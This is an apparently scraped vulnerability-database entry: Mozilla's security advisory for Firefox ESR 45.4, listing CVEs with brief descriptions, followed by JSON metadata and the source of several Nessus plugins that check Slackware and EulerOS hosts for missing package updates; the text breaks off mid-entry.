Security vulnerabilities fixed in Firefox ESR 45.4
2016-09-13T00:00:00
ID MFSA2016-86 Type mozilla Reporter Mozilla Foundation Modified 2016-09-13T00:00:00
Description
CVE-2016-5270 - Heap-buffer-overflow in nsCaseTransformTextRunFactory::TransformString [high]
Reporter: Atte Kettunen
Description: An out-of-bounds write of a boolean value during text conversion with some unicode characters. [1291016]
CVE-2016-5272 - Bad cast in nsImageGeometryMixin [high]
Reporter: Abhishek Arya
Description: A bad cast when processing layout with input elements can result in a potentially exploitable crash. [1297934]
CVE-2016-5276 - Heap-use-after-free in mozilla::a11y::DocAccessible::ProcessInvalidationList [high]
Reporter: Nils
Description: A use-after-free vulnerability triggered by setting a aria-owns attribute [1287721]
CVE-2016-5274 - use-after-free in nsFrameManager::CaptureFrameState [high]
Reporter: Nils
Description: A use-after-free issue in web animations during restyling. [1282076]
CVE-2016-5277 - Heap-use-after-free in nsRefreshDriver::Tick [high]
Reporter: Nils
Description: A user-after-free vulnerability with web animations when destroying a timeline [1291665]
CVE-2016-5278 - Heap-buffer-overflow in nsBMPEncoder::AddImageFrame [critical]
Reporter: Nils
Description: A potentially exploitable crash caused by a buffer overflow while encoding image frames to images [1294677]
CVE-2016-5280 - Use-after-free in mozilla::nsTextNodeDirectionalityMap::RemoveElementFromMap [high]
Reporter: Mei Wang
Description: Use-after-free vulnerability when changing text direction [1289970]
CVE-2016-5281 - use-after-free in DOMSVGLength [high]
Reporter: Brian Carpenter
Description: Use-after-free vulnerability when manipulating SVG format content through script [1284690]
CVE-2016-5284 - Add-on update site certificate pin expiration [high]
Reporter: Ryan Duff
Description: Due to flaws in the process we used to update "Preloaded Public Key Pinning" in our releases, the pinning for add-on updates became ineffective in early September. An attacker who was able to get a mis-issued certificate for a Mozilla web site could send malicious add-on updates to users on networks controlled by the attacker. Users who have not installed any add-ons are not affected. [1303127]
CVE-2016-5250 - Resource Timing API is storing resources sent by the previous page [moderate]
Reporter: Catalin Dumitru
Description: URLs of resources loaded after a navigation started can leak to the following page through the Resource Timing API, leading to potential information disclosure. [1254688]
CVE-2016-5261 - Integer overflow and memory corruption in WebSocketChannel [high]
Reporter: Samuel Groß
Description: An integer overflow error in WebSockets during data buffering on incoming packets resulting in attacker controlled data being written at a known offset in the allocated buffer. [1287266]
CVE-2016-5257 - Memory safety bugs fixed in Firefox 49 and Firefox ESR 45.4 [critical]
Reporter: Mozilla developers
Description: Mozilla developers and community members Christoph Diehl, Andrew McCreight, Dan Minor, Byron Campen, Jon Coppeard, Steve Fink, Tyson Smith, Philipp, and Carsten Book reported memory safety bugs present in Firefox 48 and Firefox ESR 45.3. Some of these bugs showed evidence of memory corruption and we presume that with enough effort at least some of these could be exploited to run arbitrary code. [Memory safety bugs fixed in Firefox 49 and Firefox ESR 45.4]
{"hash": "cc19d10b1bfd1db29153f02863ee1c7483a879e75fa62b96847ebe5148153ee0", "id": "MFSA2016-86", "lastseen": "2016-09-20T16:55:17", "viewCount": 2, "hashmap": [{"hash": "c8cfa02b880197e6047c9388a6d9d1d3", "key": "affectedSoftware"}, {"hash": "f9fa10ba956cacf91d7878861139efb9", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "d4be9c4fc84262b4f39f89565918568f", "key": "cvss"}, {"hash": "046625b8611063360f6904e87b15238c", "key": "description"}, {"hash": "be66f8d654a23449527a6d47c0f70d12", "key": "href"}, {"hash": "a6b67d250d46fe1e7b3a11ecda12a7d7", "key": "modified"}, {"hash": "777d45bbbcdf50d49c42c70ad7acf5fe", "key": "objectVersion"}, {"hash": "a6b67d250d46fe1e7b3a11ecda12a7d7", "key": "published"}, {"hash": "ba7fab650510d1fb05a5779092ee045c", "key": "references"}, {"hash": "69b8c22deabb5fe0d45054681cf9eafc", "key": "reporter"}, {"hash": "3d53b51d16d431cec1c442549559a8c4", "key": "title"}, {"hash": "dbeb1c32b66fd7717de583d999f89ec3", "key": "type"}], "bulletinFamily": "software", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 1, "enchantments": {"score": {"value": -0.7, "vector": "NONE", "modified": "2016-09-20T16:55:17"}, "dependencies": {"references": [{"type": "nessus", "idList": ["SLACKWARE_SSA_2017-266-02.NASL", "EULEROS_SA-2016-1017.NASL", "EULEROS_SA-2016-1046.NASL", "EULEROS_SA-2017-1002.NASL", "EULEROS_SA-2016-1013.NASL", "EULEROS_SA-2016-1084.NASL", "EULEROS_SA-2016-1003.NASL", "EULEROS_SA-2016-1002.NASL", "ORACLEVM_OVMSA-2017-0065.NASL", "SLACKWARE_SSA_2016-359-01.NASL"]}], "modified": "2016-09-20T16:55:17"}, "vulnersScore": -0.7}, "type": "mozilla", "description": "CVE-2016-5270 - Heap-buffer-overflow in nsCaseTransformTextRunFactory::TransformString [high]\nReporter: Atte Kettunen\nDescription: An out-of-bounds write of a boolean value during text conversion with some unicode characters. [1291016]\n\nCVE-2016-5272 - Bad cast in nsImageGeometryMixin [high]\nReporter: Abhishek Arya\nDescription: A bad cast when processing layout with input elements can result in a potentially exploitable crash. [1297934]\n\nCVE-2016-5276 - Heap-use-after-free in mozilla::a11y::DocAccessible::ProcessInvalidationList [high]\nReporter: Nils\nDescription: A use-after-free vulnerability triggered by setting a aria-owns attribute [1287721]\n\nCVE-2016-5274 - use-after-free in nsFrameManager::CaptureFrameState [high]\nReporter: Nils\nDescription: A use-after-free issue in web animations during restyling. [1282076]\n\nCVE-2016-5277 - Heap-use-after-free in nsRefreshDriver::Tick [high]\nReporter: Nils\nDescription: A user-after-free vulnerability with web animations when destroying a timeline [1291665]\n\nCVE-2016-5278 - Heap-buffer-overflow in nsBMPEncoder::AddImageFrame [critical]\nReporter: Nils\nDescription: A potentially exploitable crash caused by a buffer overflow while encoding image frames to images [1294677]\n\nCVE-2016-5280 - Use-after-free in mozilla::nsTextNodeDirectionalityMap::RemoveElementFromMap [high]\nReporter: Mei Wang\nDescription: Use-after-free vulnerability when changing text direction [1289970]\n\nCVE-2016-5281 - use-after-free in DOMSVGLength [high]\nReporter: Brian Carpenter\nDescription: Use-after-free vulnerability when manipulating SVG format content through script [1284690]\n\nCVE-2016-5284 - Add-on update site certificate pin expiration [high]\nReporter: Ryan Duff\nDescription: Due to flaws in the process we used to update \"Preloaded Public Key Pinning\" in our releases, the pinning for add-on updates became ineffective in early September. An attacker who was able to get a mis-issued certificate for a Mozilla web site could send malicious add-on updates to users on networks controlled by the attacker. Users who have not installed any add-ons are not affected. [1303127]\n\nCVE-2016-5250 - Resource Timing API is storing resources sent by the previous page [moderate]\nReporter: Catalin Dumitru \nDescription: URLs of resources loaded after a navigation started can leak to the following page through the Resource Timing API, leading to potential information disclosure. [1254688]\n\nCVE-2016-5261 - Integer overflow and memory corruption in WebSocketChannel [high]\nReporter: Samuel Gro\u00df\nDescription: An integer overflow error in WebSockets during data buffering on incoming packets resulting in attacker controlled data being written at a known offset in the allocated buffer. [1287266]\n\nCVE-2016-5257 - Memory safety bugs fixed in Firefox 49 and Firefox ESR 45.4 [critical]\nReporter: Mozilla developers\nDescription: Mozilla developers and community members Christoph Diehl, Andrew McCreight, Dan Minor, Byron Campen, Jon Coppeard, Steve Fink, Tyson Smith, Philipp, and Carsten Book reported memory safety bugs present in Firefox 48 and Firefox ESR 45.3. Some of these bugs showed evidence of memory corruption and we presume that with enough effort at least some of these could be exploited to run arbitrary code. [Memory safety bugs fixed in Firefox 49 and Firefox ESR 45.4]", "title": "Security vulnerabilities fixed in Firefox ESR 45.4", "history": [], "objectVersion": "1.2", "cvelist": [], "published": "2016-09-13T00:00:00", "references": ["https://bugzilla.mozilla.org/show_bug.cgi?id=1297934", "https://bugzilla.mozilla.org/show_bug.cgi?id=1289970", "https://bugzilla.mozilla.org/show_bug.cgi?id=1303127", "https://bugzilla.mozilla.org/show_bug.cgi?id=1291016", "https://bugzilla.mozilla.org/show_bug.cgi?id=1284690", "https://bugzilla.mozilla.org/show_bug.cgi?id=1287721", "https://bugzilla.mozilla.org/show_bug.cgi?id=1291665", "https://bugzilla.mozilla.org/show_bug.cgi?id=1254688", "https://bugzilla.mozilla.org/show_bug.cgi?id=1287266", "https://blog.mozilla.org/security/2016/09/16/update-on-add-on-pinning-vulnerability/", "https://bugzilla.mozilla.org/show_bug.cgi?id=1282076", "https://bugzilla.mozilla.org/show_bug.cgi?id=1294677"], "reporter": "Mozilla Foundation", "affectedSoftware": [{"version": "45.4", "name": "Firefox ESR", "operator": "lt"}], "modified": "2016-09-13T00:00:00", "href": "http://www.mozilla.org/en-US/security/advisories/mfsa2016-86/"}
{"nessus": [{"lastseen": "2018-09-01T23:51:17", "bulletinFamily": "scanner", "description": "New python packages are available for Slackware 14.0, 14.1, 14.2, and\n-current to fix a security issue.", "modified": "2017-09-25T00:00:00", "published": "2017-09-25T00:00:00", "id": "SLACKWARE_SSA_2017-266-02.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=103424", "title": "Slackware 14.0 / 14.1 / 14.2 / current : python (SSA:2017-266-02)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Slackware Security Advisory 2017-266-02. The text \n# itself is copyright (C) Slackware Linux, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(103424);\n script_version(\"$Revision: 3.1 $\");\n script_cvs_date(\"$Date: 2017/09/25 13:28:56 $\");\n\n script_cve_id(\"CVE-2016-0718\", \"CVE-2016-4472\", \"CVE-2016-9063\", \"CVE-2017-9233\");\n script_xref(name:\"SSA\", value:\"2017-266-02\");\n\n script_name(english:\"Slackware 14.0 / 14.1 / 14.2 / current : python (SSA:2017-266-02)\");\n script_summary(english:\"Checks for updated package in /var/log/packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Slackware host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"New python packages are available for Slackware 14.0, 14.1, 14.2, and\n-current to fix a security issue.\"\n );\n # http://www.slackware.com/security/viewer.php?l=slackware-security&y=2017&m=slackware-security.436421\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?9e0c1fdd\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected python package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:python\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/09/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/09/25\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017 Tenable Network Security, Inc.\");\n script_family(english:\"Slackware Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Slackware/release\", \"Host/Slackware/packages\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"slackware.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Slackware/release\")) audit(AUDIT_OS_NOT, \"Slackware\");\nif (!get_kb_item(\"Host/Slackware/packages\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Slackware\", cpu);\n\n\nflag = 0;\nif (slackware_check(osver:\"14.0\", pkgname:\"python\", pkgver:\"2.7.14\", pkgarch:\"i486\", pkgnum:\"1_slack14.0\")) flag++;\nif (slackware_check(osver:\"14.0\", arch:\"x86_64\", pkgname:\"python\", pkgver:\"2.7.14\", pkgarch:\"x86_64\", pkgnum:\"1_slack14.0\")) flag++;\n\nif (slackware_check(osver:\"14.1\", pkgname:\"python\", pkgver:\"2.7.14\", pkgarch:\"i486\", pkgnum:\"1_slack14.1\")) flag++;\nif (slackware_check(osver:\"14.1\", arch:\"x86_64\", pkgname:\"python\", pkgver:\"2.7.14\", pkgarch:\"x86_64\", pkgnum:\"1_slack14.1\")) flag++;\n\nif (slackware_check(osver:\"14.2\", pkgname:\"python\", pkgver:\"2.7.14\", pkgarch:\"i586\", pkgnum:\"1_slack14.2\")) flag++;\nif (slackware_check(osver:\"14.2\", arch:\"x86_64\", pkgname:\"python\", pkgver:\"2.7.14\", pkgarch:\"x86_64\", pkgnum:\"1_slack14.2\")) flag++;\n\nif (slackware_check(osver:\"current\", pkgname:\"python\", pkgver:\"2.7.14\", pkgarch:\"i586\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"current\", arch:\"x86_64\", pkgname:\"python\", pkgver:\"2.7.14\", pkgarch:\"x86_64\", pkgnum:\"1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:slackware_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-02-21T01:30:33", "bulletinFamily": "scanner", "description": "According to the version of the expat packages installed, the EulerOS installation on the remote host is affected by the following vulnerability :\n\n - An out-of-bounds read flaw was found in the way Expat processed certain input. A remote attacker could send specially crafted XML that, when parsed by an application using the Expat library, would cause that application to crash or, possibly, execute arbitrary code with the permission of the user running the application.(CVE-2016-0718)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "modified": "2018-11-14T00:00:00", "id": "EULEROS_SA-2017-1002.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=99849", "published": "2017-05-01T00:00:00", "title": "EulerOS 2.0 SP1 : expat (EulerOS-SA-2017-1002)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(99849);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2018/11/14 14:36:22\");\n\n script_cve_id(\n \"CVE-2016-0718\"\n );\n\n script_name(english:\"EulerOS 2.0 SP1 : expat (EulerOS-SA-2017-1002)\");\n script_summary(english:\"Checks the rpm output for the updated package.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version of the expat packages installed, the EulerOS\ninstallation on the remote host is affected by the following\nvulnerability :\n\n - An out-of-bounds read flaw was found in the way Expat\n processed certain input. A remote attacker could send\n specially crafted XML that, when parsed by an\n application using the Expat library, would cause that\n application to crash or, possibly, execute arbitrary\n code with the permission of the user running the\n application.(CVE-2016-0718)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huawei.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2017-1002\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?1767d439\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected expat package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/01/07\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:expat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:expat-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/01\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(1)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP1\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP1\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\n\nflag = 0;\n\npkgs = [\"expat-2.1.0-10\",\n \"expat-devel-2.1.0-10\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"1\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"expat\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-02-21T01:30:30", "bulletinFamily": "scanner", "description": "According to the versions of the nss nspr nss-softokn nss-util packages installed, the EulerOS installation on the remote host is affected by the following vulnerabilities :\n\n - A use-after-free flaw was found in the way NSS handled DHE (Diffie-Hellman key exchange) and ECDHE (Elliptic Curve Diffie-Hellman key exchange) handshake messages.\n A remote attacker could send a specially crafted handshake message that, when parsed by an application linked against NSS, would cause that application to crash or, under certain special conditions, execute arbitrary code using the permissions of the user running the application.(CVE-2016-1978)\n\n - A use-after-free flaw was found in the way NSS processed certain DER (Distinguished Encoding Rules) encoded cryptographic keys. An attacker could use this flaw to create a specially crafted DER encoded certificate which, when parsed by an application compiled against the NSS library, could cause that application to crash, or execute arbitrary code using the permissions of the user running the application.\n (CVE-2016-1979)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "modified": "2018-11-14T00:00:00", "id": "EULEROS_SA-2016-1017.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=99780", "published": "2017-05-01T00:00:00", "title": "EulerOS 2.0 SP1 : nss\nnspr\nnss-softokn\nnss-util (EulerOS-SA-2016-1017)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(99780);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2018/11/14 14:36:22\");\n\n script_cve_id(\n \"CVE-2016-1978\",\n \"CVE-2016-1979\"\n );\n\n script_name(english:\"EulerOS 2.0 SP1 : nss\nnspr\nnss-softokn\nnss-util (EulerOS-SA-2016-1017)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the nss nspr nss-softokn nss-util\npackages installed, the EulerOS installation on the remote host is\naffected by the following vulnerabilities :\n\n - A use-after-free flaw was found in the way NSS handled\n DHE (Diffie-Hellman key exchange) and ECDHE (Elliptic\n Curve Diffie-Hellman key exchange) handshake messages.\n A remote attacker could send a specially crafted\n handshake message that, when parsed by an application\n linked against NSS, would cause that application to\n crash or, under certain special conditions, execute\n arbitrary code using the permissions of the user\n running the application.(CVE-2016-1978)\n\n - A use-after-free flaw was found in the way NSS\n processed certain DER (Distinguished Encoding Rules)\n encoded cryptographic keys. An attacker could use this\n flaw to create a specially crafted DER encoded\n certificate which, when parsed by an application\n compiled against the NSS library, could cause that\n application to crash, or execute arbitrary code using\n the permissions of the user running the application.\n (CVE-2016-1979)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huawei.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2016-1017\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?e9fa7f8a\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected nss\nnspr\nnss-softokn\nnss-util packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/04/25\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:nspr\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:nspr-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:nss\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:nss-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:nss-softokn\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:nss-softokn-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:nss-softokn-freebl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:nss-softokn-freebl-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:nss-sysinit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:nss-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:nss-util\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:nss-util-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/01\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(1)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP1\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP1\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\n\nflag = 0;\n\npkgs = [\"nspr-4.11.0-1\",\n \"nspr-devel-4.11.0-1\",\n \"nss-3.21.0-9\",\n \"nss-devel-3.21.0-9\",\n \"nss-softokn-3.16.2.3-14.2\",\n \"nss-softokn-devel-3.16.2.3-14.2\",\n \"nss-softokn-freebl-3.16.2.3-14.2\",\n \"nss-softokn-freebl-devel-3.16.2.3-14.2\",\n \"nss-sysinit-3.21.0-9\",\n \"nss-tools-3.21.0-9\",\n \"nss-util-3.21.0-2.2\",\n \"nss-util-devel-3.21.0-2.2\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"1\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"nss\nnspr\nnss-softokn\nnss-util\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-02-21T01:30:31", "bulletinFamily": "scanner", "description": "According to the versions of the firefox package installed, the EulerOS installation on the remote host is affected by the following vulnerabilities :\n\n - Mozilla Firefox before 48.0 allows remote attackers to obtain sensitive information about the previously retrieved page via Resource Timing API calls.(CVE-2016-5250)\n\n - Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 49.0 and Firefox ESR 45.x before 45.4 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.(CVE-2016-5257)\n\n - Integer overflow in the WebSocketChannel class in the WebSockets subsystem in Mozilla Firefox before 48.0 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via crafted packets that trigger incorrect buffer-resize operations during buffering.(CVE-2016-5261)\n\n - Heap-based buffer overflow in the nsCaseTransformTextRunFactory::TransformString function in Mozilla Firefox before 49.0 and Firefox ESR 45.x before 45.4 allows remote attackers to cause a denial of service (boolean out-of-bounds write) or possibly have unspecified other impact via Unicode characters that are mishandled during text conversion.(CVE-2016-5270)\n\n - The nsImageGeometryMixin class in Mozilla Firefox before 49.0 and Firefox ESR 45.x before 45.4 does not properly perform a cast of an unspecified variable during handling of INPUT elements, which allows remote attackers to execute arbitrary code via a crafted web site.(CVE-2016-5272)\n\n - Use-after-free vulnerability in the nsFrameManager::CaptureFrameState function in Mozilla Firefox before 49.0 and Firefox ESR 45.x before 45.4 allows remote attackers to execute arbitrary code by leveraging improper interaction between restyling and the Web Animations model implementation.(CVE-2016-5274)\n\n - Use-after-free vulnerability in the mozilla::a11y::DocAccessible::ProcessInvalidationList function in Mozilla Firefox before 49.0 and Firefox ESR 45.x before 45.4 allows remote attackers to execute arbitrary code or cause a denial of service (heap memory corruption) via an aria-owns attribute.(CVE-2016-5276)\n\n - Use-after-free vulnerability in the nsRefreshDriver::Tick function in Mozilla Firefox before 49.0 and Firefox ESR 45.x before 45.4 allows remote attackers to execute arbitrary code or cause a denial of service (heap memory corruption) by leveraging improper interaction between timeline destruction and the Web Animations model implementation.(CVE-2016-5277)\n\n - Heap-based buffer overflow in the nsBMPEncoder::AddImageFrame function in Mozilla Firefox before 49.0 and Firefox ESR 45.x before 45.4 allows remote attackers to execute arbitrary code via a crafted image data that is mishandled during the encoding of an image frame to an image.(CVE-2016-5278)\n\n - 